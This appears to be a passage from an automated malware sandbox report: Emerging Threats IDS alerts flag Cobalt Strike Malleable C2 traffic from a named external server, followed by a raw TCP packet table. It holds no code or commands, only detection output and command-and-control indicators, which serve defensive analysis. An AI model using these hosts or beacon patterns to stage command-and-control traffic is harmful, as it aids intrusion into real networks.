                                                              2024-12-19T22:40:19.139463+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449736TCP
                                                              2024-12-19T22:40:21.341756+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449737TCP
                                                              2024-12-19T22:40:23.519951+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449739TCP
                                                              2024-12-19T22:40:25.721653+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449743TCP
                                                              2024-12-19T22:40:27.940593+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449745TCP
                                                              2024-12-19T22:40:30.184707+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449747TCP
                                                              2024-12-19T22:40:32.389565+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449748TCP
                                                              2024-12-19T22:40:34.593434+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449749TCP
                                                              2024-12-19T22:40:37.076058+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449750TCP
                                                              2024-12-19T22:40:39.262084+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449751TCP
                                                              2024-12-19T22:40:41.451628+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449752TCP
                                                              2024-12-19T22:40:43.637480+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449753TCP
                                                              2024-12-19T22:40:45.859708+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449754TCP
                                                              2024-12-19T22:40:48.078863+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449755TCP
                                                              2024-12-19T22:40:50.313429+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449756TCP
                                                              2024-12-19T22:40:52.531888+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449757TCP
                                                              2024-12-19T22:40:54.751135+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449758TCP
                                                              2024-12-19T22:40:57.300211+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449759TCP
                                                              2024-12-19T22:40:59.572951+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449760TCP
                                                              2024-12-19T22:41:01.797499+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449762TCP
                                                              2024-12-19T22:41:04.032576+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449769TCP
                                                              2024-12-19T22:41:06.238003+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449775TCP
                                                              2024-12-19T22:41:08.451619+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449781TCP
                                                              2024-12-19T22:41:10.661934+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449786TCP
                                                              2024-12-19T22:41:12.853433+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449792TCP
                                                              2024-12-19T22:41:15.076878+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449798TCP
                                                              2024-12-19T22:41:17.263569+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449804TCP
                                                              2024-12-19T22:41:19.468276+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449810TCP
                                                              2024-12-19T22:41:21.705590+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449815TCP
                                                              2024-12-19T22:41:24.178894+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449821TCP
                                                              2024-12-19T22:41:26.459077+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449827TCP
                                                              2024-12-19T22:41:29.199615+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449833TCP
                                                              2024-12-19T22:41:31.386751+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449840TCP
                                                              2024-12-19T22:41:33.601036+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449846TCP
                                                              2024-12-19T22:41:35.806119+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449852TCP
                                                              2024-12-19T22:41:38.368416+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449858TCP
                                                              2024-12-19T22:41:40.937992+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449865TCP
                                                              2024-12-19T22:41:43.149956+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449871TCP
                                                              2024-12-19T22:41:45.375076+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449877TCP
                                                              2024-12-19T22:41:47.592163+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449882TCP
                                                              2024-12-19T22:41:49.788480+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449888TCP
                                                              2024-12-19T22:41:51.995130+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449894TCP
                                                              2024-12-19T22:41:54.188389+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449901TCP
                                                              2024-12-19T22:41:56.390667+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449907TCP
                                                              2024-12-19T22:41:58.592336+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449913TCP
                                                              2024-12-19T22:42:00.970693+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449919TCP
                                                              2024-12-19T22:42:03.186879+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449926TCP
                                                              2024-12-19T22:42:05.412463+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449932TCP
                                                              2024-12-19T22:42:07.800162+01002033009ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response13.79.209.76443192.168.2.449938TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 22:40:03.270385981 CET4973080192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:03.390568018 CET80497303.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:03.390708923 CET4973080192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:03.390789986 CET4973080192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:03.510363102 CET80497303.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:04.711673021 CET80497303.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:04.711741924 CET80497303.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:04.711841106 CET4973080192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:04.711935043 CET4973080192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:04.831763029 CET80497303.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:05.199387074 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:05.319813013 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:05.319927931 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:05.320007086 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:05.440368891 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.615403891 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.615467072 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.615503073 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.615658998 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.615750074 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.615801096 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.615818977 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.616265059 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.616297960 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.616322994 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.616331100 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.616379023 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.617117882 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.617155075 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.617206097 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.740560055 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.740721941 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.740900040 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.744831085 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.787975073 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.802793980 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.802947044 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.803141117 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.806976080 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.807167053 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.807235956 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.815486908 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.818499088 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.818677902 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.818789959 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.827208996 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.827244997 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.827277899 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.834981918 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.835037947 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.835094929 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.843545914 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.843614101 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.843735933 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.851994038 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.852027893 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.852080107 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.860371113 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.860436916 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.860477924 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.869141102 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.869227886 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.869255066 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.877311945 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.877398968 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.877404928 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.907666922 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.907737970 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.907749891 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.923007965 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.923082113 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.994518042 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.994556904 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.994649887 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:06.995719910 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.995857954 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:06.995929956 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.000667095 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.000731945 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.000812054 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.005599022 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.005654097 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.005712986 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.010507107 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.010679007 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.010751009 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.015290976 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.015403032 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.015465975 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.019972086 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.020072937 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.020133018 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.024720907 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.024823904 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.024883986 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.029432058 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.029524088 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.029608965 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.034102917 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.034214973 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.034271955 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.038834095 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.038964987 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.039028883 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.043554068 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.043633938 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.043718100 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.048315048 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.048430920 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.048504114 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.053064108 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.053212881 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.053272009 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.056885958 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.057005882 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.057090044 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.060677052 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.060805082 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.060873032 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.064560890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.064666033 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.064742088 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.068435907 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.068533897 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.068609953 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.072227955 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.072417974 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.072479010 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.076045990 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.076176882 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.076241016 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.079885960 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.080008030 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.080087900 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.114505053 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.114561081 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.114821911 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.116446972 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.116497040 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.116559982 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.120259047 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.120428085 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.120496035 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.124124050 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.178592920 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.186691046 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.186829090 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.187053919 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.187977076 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.188452959 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.188560009 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.188616037 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.191310883 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.191431046 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.191534042 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.194525957 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.194578886 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.194629908 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.197112083 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.197190046 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.197206974 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.199898005 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.200018883 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.200026035 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.202697039 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.202794075 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.202894926 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.205369949 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.205461979 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.205496073 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.207963943 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.208061934 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.208152056 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.210617065 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.210721970 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.210742950 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.213202953 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.213538885 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.213675022 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.215852022 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.215936899 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.215971947 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.218581915 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.218616962 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.218663931 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.221070051 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.221127987 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.221179008 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.223673105 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.223831892 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.223884106 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.226309061 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.226388931 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.226438999 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.229182005 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.229235888 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.229259968 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.231515884 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.231611013 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.231709003 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.234132051 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.234194994 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.234364033 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.236738920 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.236829996 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.236840010 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.239398956 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.239451885 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.239489079 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.242006063 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.242096901 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.242114067 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.243949890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.244031906 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.244070053 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.245851994 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.245934010 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.245971918 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.247777939 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.247848988 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.247912884 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.249715090 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.249784946 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.249855995 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.251709938 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.251763105 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.251786947 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.253660917 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.253789902 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.253818989 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.255584955 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.255664110 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.255698919 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.257538080 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.257620096 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.257703066 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.259483099 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.259555101 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.259614944 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.261421919 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.261487007 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.261526108 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.263382912 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.263453007 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.263469934 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.265290022 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.265386105 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.265409946 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.267230034 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.267298937 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.267363071 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.269203901 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.269273043 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.269335985 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.271119118 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.271179914 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.271250010 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.273047924 CET80497313.79.209.76192.168.2.4
